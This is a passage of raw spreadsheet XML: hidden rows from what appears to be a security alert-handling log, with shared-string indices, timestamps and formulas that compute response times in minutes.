        <f t="shared" ref="BA45:BA76" si="10">IF(A45&lt;&gt;"最新威胁",IF(ISBLANK(AX45),IF(ISBLANK(AE45),ROUND((AC45-B45)*24*60,2),ROUND((AE45-B45)*24*60,2)),ROUND((AX45-B45)*24*60,2)),"")</f>
        <v>2.65</v>
      </c>
      <c r="BB45" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC45" s="9">
        <f t="shared" si="8"/>
        <v>2.65</v>
      </c>
      <c r="BD45" s="9">
        <f t="shared" si="9"/>
        <v>2.65</v>
      </c>
    </row>
    <row r="46" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A46" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B46" s="2">
        <v>45977.5289467593</v>
      </c>
      <c r="C46" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D46" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E46" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F46" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G46" s="10"/>
      <c r="H46" s="10"/>
      <c r="I46" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J46" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K46" s="10"/>
      <c r="L46" s="10"/>
      <c r="M46" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N46" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O46" s="17" t="s">
        <v>8432</v>
      </c>
      <c r="P46" s="10"/>
      <c r="Q46" s="10"/>
      <c r="R46" s="10"/>
      <c r="S46" s="10" t="s">
        <v>9950</v>
      </c>
      <c r="T46" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U46" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V46" s="12" t="s">
        <v>8460</v>
      </c>
      <c r="W46" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X46" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y46" s="10" t="s">
        <v>10988</v>
      </c>
      <c r="Z46" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA46" s="10"/>
      <c r="AB46" s="10"/>
      <c r="AC46" s="14">
        <v>45977.530775463</v>
      </c>
      <c r="AD46" s="14">
        <v>45977.525162037</v>
      </c>
      <c r="AE46" s="10"/>
      <c r="AF46" s="10"/>
      <c r="AG46" s="14"/>
      <c r="AH46" s="10"/>
      <c r="AI46" s="10"/>
      <c r="AJ46" s="10"/>
      <c r="AK46" s="10"/>
      <c r="AL46" s="10"/>
      <c r="AM46" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN46" s="10"/>
      <c r="AO46" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP46" s="10"/>
      <c r="AQ46" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR46" s="10"/>
      <c r="AS46" s="10"/>
      <c r="AT46" s="10"/>
      <c r="AU46" s="10"/>
      <c r="AV46" s="10"/>
      <c r="AW46" s="10"/>
      <c r="AX46" s="14"/>
      <c r="AY46" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ46" s="9">
        <f t="shared" si="6"/>
        <v>5.45</v>
      </c>
      <c r="BA46" s="9">
        <f t="shared" si="10"/>
        <v>2.63</v>
      </c>
      <c r="BB46" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC46" s="9">
        <f t="shared" si="8"/>
        <v>2.63</v>
      </c>
      <c r="BD46" s="9">
        <f t="shared" si="9"/>
        <v>2.63</v>
      </c>
    </row>
    <row r="47" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A47" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B47" s="2">
        <v>45977.5292592593</v>
      </c>
      <c r="C47" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D47" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E47" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F47" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G47" s="10"/>
      <c r="H47" s="10"/>
      <c r="I47" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J47" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K47" s="10"/>
      <c r="L47" s="10"/>
      <c r="M47" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N47" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O47" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P47" s="10"/>
      <c r="Q47" s="10"/>
      <c r="R47" s="10"/>
      <c r="S47" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T47" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U47" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V47" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W47" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X47" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y47" s="10" t="s">
        <v>10985</v>
      </c>
      <c r="Z47" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA47" s="10"/>
      <c r="AB47" s="10"/>
      <c r="AC47" s="14">
        <v>45977.5322337963</v>
      </c>
      <c r="AD47" s="14">
        <v>45977.5261458333</v>
      </c>
      <c r="AE47" s="14"/>
      <c r="AF47" s="14"/>
      <c r="AG47" s="14"/>
      <c r="AH47" s="10"/>
      <c r="AI47" s="10"/>
      <c r="AJ47" s="10"/>
      <c r="AK47" s="10"/>
      <c r="AL47" s="10"/>
      <c r="AM47" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN47" s="10"/>
      <c r="AO47" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP47" s="10"/>
      <c r="AQ47" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR47" s="10"/>
      <c r="AS47" s="10"/>
      <c r="AT47" s="10"/>
      <c r="AU47" s="10"/>
      <c r="AV47" s="10"/>
      <c r="AW47" s="10"/>
      <c r="AX47" s="14"/>
      <c r="AY47" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ47" s="9">
        <f t="shared" si="6"/>
        <v>4.48</v>
      </c>
      <c r="BA47" s="9">
        <f t="shared" si="10"/>
        <v>4.28</v>
      </c>
      <c r="BB47" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC47" s="9">
        <f t="shared" si="8"/>
        <v>4.28</v>
      </c>
      <c r="BD47" s="9">
        <f t="shared" si="9"/>
        <v>4.28</v>
      </c>
    </row>
    <row r="48" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A48" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B48" s="2">
        <v>45977.5306944444</v>
      </c>
      <c r="C48" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D48" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E48" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F48" s="10" t="s">
        <v>11585</v>
      </c>
      <c r="G48" s="10"/>
      <c r="H48" s="10"/>
      <c r="I48" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J48" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K48" s="10"/>
      <c r="L48" s="10"/>
      <c r="M48" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N48" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O48" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P48" s="10"/>
      <c r="Q48" s="10"/>
      <c r="R48" s="10"/>
      <c r="S48" s="10" t="s">
        <v>9950</v>
      </c>
      <c r="T48" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U48" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V48" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W48" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X48" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y48" s="10" t="s">
        <v>10982</v>
      </c>
      <c r="Z48" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA48" s="10"/>
      <c r="AB48" s="10"/>
      <c r="AC48" s="14">
        <v>45977.5338888889</v>
      </c>
      <c r="AD48" s="14">
        <v>45977.5273958333</v>
      </c>
      <c r="AE48" s="14"/>
      <c r="AF48" s="14"/>
      <c r="AG48" s="14"/>
      <c r="AH48" s="10"/>
      <c r="AI48" s="10"/>
      <c r="AJ48" s="10"/>
      <c r="AK48" s="10"/>
      <c r="AL48" s="10"/>
      <c r="AM48" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN48" s="10"/>
      <c r="AO48" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP48" s="10"/>
      <c r="AQ48" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR48" s="10"/>
      <c r="AS48" s="10"/>
      <c r="AT48" s="10"/>
      <c r="AU48" s="10"/>
      <c r="AV48" s="10"/>
      <c r="AW48" s="10"/>
      <c r="AX48" s="14"/>
      <c r="AY48" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ48" s="9">
        <f t="shared" si="6"/>
        <v>4.75</v>
      </c>
      <c r="BA48" s="9">
        <f t="shared" si="10"/>
        <v>4.6</v>
      </c>
      <c r="BB48" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC48" s="9">
        <f t="shared" si="8"/>
        <v>4.6</v>
      </c>
      <c r="BD48" s="9">
        <f t="shared" si="9"/>
        <v>4.6</v>
      </c>
    </row>
    <row r="49" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A49" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B49" s="2">
        <v>45977.5307291667</v>
      </c>
      <c r="C49" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D49" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E49" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F49" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G49" s="10"/>
      <c r="H49" s="10"/>
      <c r="I49" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J49" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K49" s="10"/>
      <c r="L49" s="10"/>
      <c r="M49" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N49" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O49" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P49" s="10"/>
      <c r="Q49" s="10"/>
      <c r="R49" s="10"/>
      <c r="S49" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T49" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U49" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V49" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W49" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X49" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y49" s="10" t="s">
        <v>10974</v>
      </c>
      <c r="Z49" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA49" s="10"/>
      <c r="AB49" s="10"/>
      <c r="AC49" s="14">
        <v>45977.5331828704</v>
      </c>
      <c r="AD49" s="14">
        <v>45977.527025463</v>
      </c>
      <c r="AE49" s="10"/>
      <c r="AF49" s="14"/>
      <c r="AG49" s="14"/>
      <c r="AH49" s="10"/>
      <c r="AI49" s="10"/>
      <c r="AJ49" s="10"/>
      <c r="AK49" s="10"/>
      <c r="AL49" s="10"/>
      <c r="AM49" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN49" s="10"/>
      <c r="AO49" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP49" s="10"/>
      <c r="AQ49" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR49" s="10"/>
      <c r="AS49" s="10"/>
      <c r="AT49" s="10"/>
      <c r="AU49" s="10"/>
      <c r="AV49" s="10"/>
      <c r="AW49" s="10"/>
      <c r="AX49" s="14"/>
      <c r="AY49" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ49" s="9">
        <f t="shared" si="6"/>
        <v>5.33</v>
      </c>
      <c r="BA49" s="9">
        <f t="shared" si="10"/>
        <v>3.53</v>
      </c>
      <c r="BB49" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC49" s="9">
        <f t="shared" si="8"/>
        <v>3.53</v>
      </c>
      <c r="BD49" s="9">
        <f t="shared" si="9"/>
        <v>3.53</v>
      </c>
    </row>
    <row r="50" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A50" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B50" s="2">
        <v>45977.5319560185</v>
      </c>
      <c r="C50" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D50" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E50" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F50" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G50" s="10"/>
      <c r="H50" s="10"/>
      <c r="I50" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J50" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K50" s="10"/>
      <c r="L50" s="10"/>
      <c r="M50" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N50" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O50" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P50" s="10"/>
      <c r="Q50" s="10"/>
      <c r="R50" s="10"/>
      <c r="S50" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T50" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U50" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V50" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W50" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X50" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y50" s="10" t="s">
        <v>10977</v>
      </c>
      <c r="Z50" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA50" s="10"/>
      <c r="AB50" s="10"/>
      <c r="AC50" s="14">
        <v>45977.5339583333</v>
      </c>
      <c r="AD50" s="14">
        <v>45977.5296180556</v>
      </c>
      <c r="AE50" s="14"/>
      <c r="AF50" s="14"/>
      <c r="AG50" s="14"/>
      <c r="AH50" s="10"/>
      <c r="AI50" s="10"/>
      <c r="AJ50" s="10"/>
      <c r="AK50" s="10"/>
      <c r="AL50" s="10"/>
      <c r="AM50" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN50" s="10"/>
      <c r="AO50" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP50" s="10"/>
      <c r="AQ50" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR50" s="14"/>
      <c r="AS50" s="10"/>
      <c r="AT50" s="10"/>
      <c r="AU50" s="10"/>
      <c r="AV50" s="10"/>
      <c r="AW50" s="10"/>
      <c r="AX50" s="14"/>
      <c r="AY50" s="1" t="e">
        <f>VLOOKUP(E50,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ50" s="9">
        <f t="shared" si="6"/>
        <v>3.37</v>
      </c>
      <c r="BA50" s="9">
        <f t="shared" si="10"/>
        <v>2.88</v>
      </c>
      <c r="BB50" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC50" s="9">
        <f t="shared" si="8"/>
        <v>2.88</v>
      </c>
      <c r="BD50" s="9">
        <f t="shared" si="9"/>
        <v>2.88</v>
      </c>
    </row>
    <row r="51" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A51" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B51" s="2">
        <v>45977.5320023148</v>
      </c>
      <c r="C51" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D51" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E51" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F51" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G51" s="10"/>
      <c r="H51" s="10"/>
      <c r="I51" s="18" t="s">
        <v>11568</v>
      </c>
      <c r="J51" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K51" s="10"/>
      <c r="L51" s="10"/>
      <c r="M51" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N51" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O51" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P51" s="10"/>
      <c r="Q51" s="10"/>
      <c r="R51" s="10"/>
      <c r="S51" s="10" t="s">
        <v>9950</v>
      </c>
      <c r="T51" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U51" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V51" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W51" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X51" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y51" s="10" t="s">
        <v>10979</v>
      </c>
      <c r="Z51" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA51" s="10"/>
      <c r="AB51" s="10"/>
      <c r="AC51" s="14">
        <v>45977.5337037037</v>
      </c>
      <c r="AD51" s="14">
        <v>45977.5296180556</v>
      </c>
      <c r="AE51" s="14"/>
      <c r="AF51" s="14"/>
      <c r="AG51" s="14"/>
      <c r="AH51" s="10"/>
      <c r="AI51" s="10"/>
      <c r="AJ51" s="10"/>
      <c r="AK51" s="10"/>
      <c r="AL51" s="10"/>
      <c r="AM51" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN51" s="10"/>
      <c r="AO51" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP51" s="10"/>
      <c r="AQ51" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR51" s="14"/>
      <c r="AS51" s="10"/>
      <c r="AT51" s="10"/>
      <c r="AU51" s="10"/>
      <c r="AV51" s="10"/>
      <c r="AW51" s="10"/>
      <c r="AX51" s="14"/>
      <c r="AY51" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ51" s="9">
        <f t="shared" si="6"/>
        <v>3.43</v>
      </c>
      <c r="BA51" s="9">
        <f t="shared" si="10"/>
        <v>2.45</v>
      </c>
      <c r="BB51" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC51" s="9">
        <f t="shared" si="8"/>
        <v>2.45</v>
      </c>
      <c r="BD51" s="9">
        <f t="shared" si="9"/>
        <v>2.45</v>
      </c>
    </row>
    <row r="52" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A52" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B52" s="2">
        <v>46009.7209837963</v>
      </c>
      <c r="C52" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D52" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E52" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F52" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G52" s="10"/>
      <c r="H52" s="10"/>
      <c r="I52" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J52" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K52" s="10"/>
      <c r="L52" s="10"/>
      <c r="M52" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N52" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O52" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P52" s="10"/>
      <c r="Q52" s="10"/>
      <c r="R52" s="10"/>
      <c r="S52" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T52" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U52" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V52" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W52" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X52" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y52" s="10" t="s">
        <v>10694</v>
      </c>
      <c r="Z52" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA52" s="10"/>
      <c r="AB52" s="10"/>
      <c r="AC52" s="14">
        <v>46009.7283912037</v>
      </c>
      <c r="AD52" s="14">
        <v>46009.7182986111</v>
      </c>
      <c r="AE52" s="14">
        <v>46009.7239930556</v>
      </c>
      <c r="AF52" s="14"/>
      <c r="AG52" s="14"/>
      <c r="AH52" s="10"/>
      <c r="AI52" s="10"/>
      <c r="AJ52" s="10"/>
      <c r="AK52" s="10"/>
      <c r="AL52" s="10"/>
      <c r="AM52" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN52" s="10"/>
      <c r="AO52" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP52" s="10"/>
      <c r="AQ52" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR52" s="10"/>
      <c r="AS52" s="10"/>
      <c r="AT52" s="10"/>
      <c r="AU52" s="10"/>
      <c r="AV52" s="10"/>
      <c r="AW52" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX52" s="14">
        <v>46009.7239814815</v>
      </c>
      <c r="AY52" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ52" s="9">
        <f t="shared" si="6"/>
        <v>3.87</v>
      </c>
      <c r="BA52" s="9">
        <f t="shared" si="10"/>
        <v>4.32</v>
      </c>
      <c r="BB52" s="9">
        <f t="shared" si="7"/>
        <v>4.32</v>
      </c>
      <c r="BC52" s="9">
        <f t="shared" si="8"/>
        <v>10.67</v>
      </c>
      <c r="BD52" s="9">
        <f t="shared" si="9"/>
        <v>10.67</v>
      </c>
    </row>
    <row r="53" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A53" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B53" s="2">
        <v>46027.0146990741</v>
      </c>
      <c r="C53" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D53" s="10" t="s">
        <v>10543</v>
      </c>
      <c r="E53" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F53" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G53" s="10"/>
      <c r="H53" s="10"/>
      <c r="I53" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J53" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K53" s="10"/>
      <c r="L53" s="10"/>
      <c r="M53" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N53" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O53" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P53" s="10"/>
      <c r="Q53" s="10"/>
      <c r="R53" s="10"/>
      <c r="S53" s="10" t="s">
        <v>10681</v>
      </c>
      <c r="T53" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U53" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V53" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W53" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X53" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y53" s="10" t="s">
        <v>10546</v>
      </c>
      <c r="Z53" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA53" s="10"/>
      <c r="AB53" s="10"/>
      <c r="AC53" s="14">
        <v>46027.0147106481</v>
      </c>
      <c r="AD53" s="14">
        <v>46027.0122222222</v>
      </c>
      <c r="AE53" s="14"/>
      <c r="AF53" s="14"/>
      <c r="AG53" s="14"/>
      <c r="AH53" s="10"/>
      <c r="AI53" s="10"/>
      <c r="AJ53" s="10"/>
      <c r="AK53" s="10"/>
      <c r="AL53" s="10"/>
      <c r="AM53" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN53" s="10"/>
      <c r="AO53" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP53" s="10"/>
      <c r="AQ53" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR53" s="10"/>
      <c r="AS53" s="10"/>
      <c r="AT53" s="10"/>
      <c r="AU53" s="10"/>
      <c r="AV53" s="10"/>
      <c r="AW53" s="10"/>
      <c r="AX53" s="14"/>
      <c r="AY53" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ53" s="9">
        <f t="shared" si="6"/>
        <v>3.57</v>
      </c>
      <c r="BA53" s="9">
        <f t="shared" si="10"/>
        <v>0.02</v>
      </c>
      <c r="BB53" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC53" s="9">
        <f t="shared" si="8"/>
        <v>0.02</v>
      </c>
      <c r="BD53" s="9">
        <f t="shared" si="9"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="54" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A54" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B54" s="2">
        <v>46049.8673611111</v>
      </c>
      <c r="C54" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D54" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E54" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F54" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G54" s="10"/>
      <c r="H54" s="10"/>
      <c r="I54" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J54" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K54" s="10"/>
      <c r="L54" s="10"/>
      <c r="M54" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N54" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O54" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P54" s="10"/>
      <c r="Q54" s="10"/>
      <c r="R54" s="10"/>
      <c r="S54" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T54" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U54" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V54" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W54" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X54" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y54" s="10" t="s">
        <v>10437</v>
      </c>
      <c r="Z54" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA54" s="10"/>
      <c r="AB54" s="10"/>
      <c r="AC54" s="14">
        <v>46049.868912037</v>
      </c>
      <c r="AD54" s="14">
        <v>46049.8426388889</v>
      </c>
      <c r="AE54" s="14"/>
      <c r="AF54" s="14"/>
      <c r="AG54" s="14"/>
      <c r="AH54" s="10"/>
      <c r="AI54" s="10"/>
      <c r="AJ54" s="10"/>
      <c r="AK54" s="10"/>
      <c r="AL54" s="10"/>
      <c r="AM54" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN54" s="10"/>
      <c r="AO54" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP54" s="10"/>
      <c r="AQ54" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR54" s="10"/>
      <c r="AS54" s="10"/>
      <c r="AT54" s="10"/>
      <c r="AU54" s="10"/>
      <c r="AV54" s="10"/>
      <c r="AW54" s="10"/>
      <c r="AX54" s="14"/>
      <c r="AY54" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ54" s="9">
        <f t="shared" si="6"/>
        <v>35.6</v>
      </c>
      <c r="BA54" s="9">
        <f t="shared" si="10"/>
        <v>2.23</v>
      </c>
      <c r="BB54" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC54" s="9">
        <f t="shared" si="8"/>
        <v>2.23</v>
      </c>
      <c r="BD54" s="9">
        <f t="shared" si="9"/>
        <v>2.23</v>
      </c>
    </row>
    <row r="55" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A55" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B55" s="2">
        <v>46049.8673958333</v>
      </c>
      <c r="C55" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D55" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E55" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F55" s="10" t="s">
        <v>11585</v>
      </c>
      <c r="G55" s="10"/>
      <c r="H55" s="10"/>
      <c r="I55" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J55" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K55" s="10"/>
      <c r="L55" s="10"/>
      <c r="M55" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N55" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O55" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P55" s="10"/>
      <c r="Q55" s="10"/>
      <c r="R55" s="10"/>
      <c r="S55" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T55" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U55" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V55" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W55" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X55" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y55" s="10" t="s">
        <v>10434</v>
      </c>
      <c r="Z55" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA55" s="10"/>
      <c r="AB55" s="10"/>
      <c r="AC55" s="14">
        <v>46049.8704976852</v>
      </c>
      <c r="AD55" s="14">
        <v>46049.8427430556</v>
      </c>
      <c r="AE55" s="10"/>
      <c r="AF55" s="14"/>
      <c r="AG55" s="14"/>
      <c r="AH55" s="10"/>
      <c r="AI55" s="10"/>
      <c r="AJ55" s="10"/>
      <c r="AK55" s="10"/>
      <c r="AL55" s="10"/>
      <c r="AM55" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN55" s="10"/>
      <c r="AO55" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP55" s="10"/>
      <c r="AQ55" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR55" s="10"/>
      <c r="AS55" s="10"/>
      <c r="AT55" s="10"/>
      <c r="AU55" s="10"/>
      <c r="AV55" s="10"/>
      <c r="AW55" s="10"/>
      <c r="AX55" s="14"/>
      <c r="AY55" s="1" t="s">
        <v>11592</v>
      </c>
